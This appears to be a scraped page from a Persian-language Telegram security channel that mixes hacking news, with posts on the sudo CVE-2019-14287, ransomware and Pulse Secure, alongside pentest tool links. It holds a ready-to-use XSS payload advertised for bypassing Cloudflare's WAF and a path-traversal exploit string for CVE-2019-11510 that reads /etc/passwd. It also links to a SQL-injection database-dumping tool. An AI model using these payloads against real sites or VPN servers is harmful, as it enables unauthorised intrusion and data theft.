امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
کشف آسیب پذیری در Sudo

آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!

تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.


اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


#news
#linux
#exploit
#privesc


@sec_nerd
مقام امریکایی که نخواست هویتش افشا شود در مصاحبه با رویترز اعلام کرد ایالات متحده حمله سایبری را در اواخر ماه سپتامبر علیه ایران ترتیب داده است.
این فرد مدعی شد حمله ی مذکور سخت افزار فیزیکی را هدف قرار داده و از اعلام جزییات بیشتری در این خصوص خودداری کرد.
این حمله پس از حمله به تاسیسات نفتی عربستان رخ داده اما پنتاگون در این خصوص اظهار نظر نکرده است.


منبع:
https://www.reuters.com/article/us-usa-iran-military-cyber-exclusive/exclusive-us-carried-out-secret-cyber-strike-on-iran-in-wake-of-saudi-oil-attack-officials-say-idUSKBN1WV0EK


#usa
#iran
#news


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
sqlbuster

ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based

https://github.com/geek-repo/sqlbuster


#web
#pentest
#sqli


@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
Don't panic! sudo flaw CVE-2019-14287 needs a specific config.

If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:

myhost bob = (ALL, !root) /usr/bin/vi

https://www.openwall.com/lists/oss-security/2019/10/14/1


ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.

اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.

https://twitter.com/2xyo/status/1183839706586537985

#linux
#exploit
#privesc


@sec_nerd
شرکت emsisoft برنامه رمزگشای باج افزار Puma را منتشر کرد

این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.

دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma



#ransome
#puma
#ransomware

@sec_nerd
فرارسیدن اربعین حسینی را به همه ی بزرگواران همراه تسلیت عرض میکنیم.


ما رو از دعای خیرتون محروم نفرمایید.




@sec_nerd
تو شرکتمون مسئول مصاحبه هستم

اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟

کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمی‌کنم





دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.


#سخن_نیک
#motivation

@sec_nerd
cloudflare «XSS» payload to bypass protection.
🦍


{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

#BugBounty #BugBountyTip #WAF #infosec

@sec_nerd
هکرهای روس زبان نسخه ی دستکاری شده ی مرورگر tor را تحت عنوان «نسخه اصلی روسی» به کاربران دادند و اقدام به سرقت بیت کوین از آنان کردند.
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.



توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127



#news
#tor
#malware
#darknet
#russia


@sec_nerd
سلام
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.

دنبال کنید و به دوستان خودتون هم معرفی کنید.

@web_priv8


@sec_nerd
دستورالعمل اجرایی بیت کوین در ایستگاه پایانی/برق ماینرها قطع شد

مصطفی رجبی مشهدی (سخنگوی صنعت برق) در گفت‌وگو با خبرنگار اقتصادی خبرگزاری فارس، در پاسخ به این سؤال که آیا با توجه به قانونی شدن استخراج رمز ارزها دستورالعمل این قانون تهیه شده است، گفت: وزارت صنعت، معدن و تجارت و وزارت نیرو در حال تهیه دستورالعمل اجرایی استخراج رمز ارزها هستند و این دستورالعمل در مراحل پایانی قرار داشته و به زودی نهایی می‌شود.

رجبی مشهدی با اشاره به اینکه بر اساس مصوبه دولت به دو شکل تأمین برق برای استخراج رمز ارزها باید صورت بگیرد، گفت: یکی از روش‌های تأمین برق تولید بیت کوین این است که تعرفه برق برای ماینرها متوسط برق صادراتی باشد و روش دوم این است که استخراج‌کنندگان رمز ارزها می‌توانند نیروگاه احداث کنند.

وی ادامه داد: متقاضیانی که نیروگاه احداث کنند برای آنها 70 درصد نرخ گاز صادراتی محاسبه می‌شود و افرادی که نیروگاه تجدیدپذیر احداث کنند نمی‌توانند مستقل از شبکه برق باشند، پس باید تا زمان نهایی شدن دستورالعمل که در حال تدوین است منتظر ماند.

* با استفاده از برق ارزان برای ماینینگ برخورد می شود

سخنگوی صنعت برق در پاسخ به این سؤال که تعدادی از ماینرها به دلیل نارضایتی از بابت محاسبه متوسط برق صادراتی برای آنها در حال خروج از ایران هستند و آیا در این مدت مزارع تولید بیت‌کوین شناسایی شده است، گفت: هر مشترکی که بخواهد از برق ارزان برای تولید بیت‌کوین و استخراج رمز ارزها استفاده کند با آن برخورد خواهد شد.

وی ادامه داد: یک ماه قبل 150 مگاوات به دلیل همین استفاده از برق ارزان صورتجلسه شده و برق آنها قطع شد.

رجبی‌ مشهدی با اشاره به اینکه عمدتاً این 150 مگاوات مربوط به استان‌های شمالی کشور بوده است، گفت: به هر حال مصرف برق بعد از عبور پیک تابستان کاهش می‌یابد و نیروگاه‌ها به تدریج برای تعمیرات نیروگاهی و آمادگی برای تولید برق در فصل تابستان آماده می‌شوند پس باید ماینرها به قانون احترام بگذارند و از برق ارزان به خصوص تعرفه برق کشاورزی خودداری کنند.

https://fna.ir/dcm6i8


#news
#btc
#iran


@sec_nerd
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
بیش از 14500 سرور Pulse secure در برابر اکسپلویت CVE-2019-11510 آسیب پذیر هستند.

ده کشور اول در این خصوص در تصویر قابل مشاهده است.

نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.



https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/



#pulse
#news
#usa


@sec_nerd
#fun

بخاطر رتبه بهتر در مسابقات تفنگ آب پاش مدرسه رو هک کرده!

@sec_nerd